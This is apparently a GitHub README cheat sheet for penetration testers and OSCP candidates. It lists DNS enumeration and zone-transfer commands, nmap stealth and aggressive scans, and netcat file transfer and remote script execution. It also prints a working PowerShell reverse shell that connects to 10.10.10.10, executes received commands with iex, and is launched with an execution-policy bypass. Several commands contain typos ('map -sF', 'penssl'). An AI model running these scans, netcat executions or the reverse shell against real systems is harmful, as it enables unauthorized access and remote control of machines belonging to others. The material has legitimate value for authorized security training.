Pentest-Cheat-Sheets

This repo has a collection of snippets of codes and commands to help our lives! The main purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.

Ninja Tricks

• Recon
  • DNS
  • Nmap
  • NetCat
  • SNMP
  • Mysql
  • MS SQL
  • Web Enumeration
• Exploitation
  • System Network
    • RDP
    • Pass The Hash
    • Windows-Shell
  • Web Application
    • Web Remote Code Execution
    • LFI
    • encode
    • XSS
    • SQLi
      • sqlmap
      • Bare Hands
    • Jekins
• Pos-exploitation
  • Reverse Shell
    • PHP Reverse Shell
    • Perl Reverse Shell
    • python Reverse Shell
    • Ruby Reverse Shell
    • bash Reverse Shell
    • powershell Reverse
  • Linux
    • Linux Privilege Escalation
    • Data Haversting and Enumeration
    • Linux Pivot
      • Sshutle
      • VPNPivot
      • SSH Tunneling
      • Linux Backdoring
  • Windows
    • Windows Enumeration
    • Windows Privilege Escalation
    • Hashdump
    • Transferring Files Without Metasploit
    • Backdoring
    • Windows Pivot
      • Plink
• Resources
  • Wordlist
    • seclist
    • cotse
    • PacketStorm
  • Default Passwords
    • Default Passoword
    • Router Password
  • Leak
    • Pastebin
  • Tables
• Contribution

Recon

DNS

Nslookup

Resolve a given hostname to the corresponding IP.

nslookup targetorganization.com

Reverse DNS lookup

nslookup -type=PTR IP_address

MX(Mail Exchange) lookup

nslookup -type=MX domain

Zone Transfer

Using nslookup Command

nslookup
server domain.com
ls -d domain.com

Using HOST Command

host -t ns(Name Server) < domain >

host -t ns domain.com

after that test nameservers

host -l < domain > < nameserver >

host -l domain.com ns2.domain.com

Nmap Dns Enumaration

nmap -F --dns-server <dns server ip> <target ip range>

Auto tools

DNSenum

dnsenum targetdomain.com

dnsenum --target_domain_subs.txt -v -f dns.txt -u a -r targetdomain.com

DNSmap

dnsmap targetdomain.com -w <Wordlst file.txt>

Brute Force, the file is saved in /tmp

dnsmap targetdomain.com -r

DNSRecon DNS Brute Force

dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml

Fierce.pl

fierce -dns targetdomain.com

HostMap

hostmap.rb -only-passive -t <IP>

We can use -with-zonetransfer or -bruteforce-level

Online Tools

• https://dnsdumpster.com/
• https://network-tools.com/nslook/
• https://www.dnsqueries.com/en/
• https://mxtoolbox.com/

Namp

Set the ip address as a varible export ip=192.168.1.100 export netw=192.168.1.0/24

Detecting Live Hosts

Only Ip's

nmap -sn -n $netw | grep for | cut -d" " -f5

Stealth Scan

nmap -sS $ip

Only Open Ports and Banner Grab

nmap -n -Pn -sS $ip --open -sV

Stealth scan using FIN Scan

map -sF $ip

Agressive scan

Without Ping scan, no dns resolution, show only open ports all and test All TCP Ports

nmap -n -Pn -sS -A $ip --open -p-

Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and scripts against services

nmap –v –sS –A –T4 $ip

OS FigerPrint

nmap -O $ip

Quick Scan

nmap -T4 -F $netw

Quick Scan Plus

nmap -sV -T4 -O -F --version-light $netw

output to a file

nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip

output to a file Plus

nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw

Search NMAP scripts

ls /usr/share/nmap/scripts/ | grep ftp

• Nmap Discovery

NetCat

Port Scanner

One port

nc -nvz 192.168.1.23 80

Port Range

nc -vnz 192.168.1.23 0-1000

Send files

• Server

nc -lvp 1234 > file_name_to_save

• Client

nc -vn 192.168.1.33 1234 < file_to_send

Executing remote script

• Server

nc -lvp 1234 -e ping.sh <IP>

• Client

nc -vn 192.168.1.33 1234

Chat with encryption

• Server

ncat -nlvp 8000 --ssl

• Client

ncat -nv 192.168.1.33 8000

Banner Grabbing

nc target port
HTTP_Verb path http/version
Host: url

nc www.bla.com.br 80
HEAD / HTTP/1.0
Host: www.bla.com.br

If this site uses https you need to use openssl

penssl s_client -quiet www.bla.com.br:443

Reverse Shell

Powershell Reverse

Create a simple powershell script called reverse.ps1:

function reverse_powershell {
    $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
}

powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powershell"

Resources

• Wordlists
  • PacketStorm
  • SecList
  • cotse
• Default Password
  • DefaultPassword
  • RouterPassword
• Leak
  • Pastebin
• Tables
  • RainbowCrack

Contribution

HOW TO